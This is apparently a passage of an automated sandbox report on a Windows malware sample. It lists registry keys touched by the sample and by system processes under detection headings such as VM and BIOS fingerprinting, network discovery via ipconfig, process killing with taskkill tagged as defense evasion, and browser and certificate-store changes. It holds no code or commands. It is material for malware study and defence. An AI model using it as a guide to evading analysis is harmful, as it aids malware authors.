Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\TypedURLs C:\Windows\system32\taskmgr.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133895701868183330" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\L1041" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 040000000500000003000000020000000100000000000000ffffffff C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\7\NodeSlot = "18" C:\Windows\explorer.exe N/A
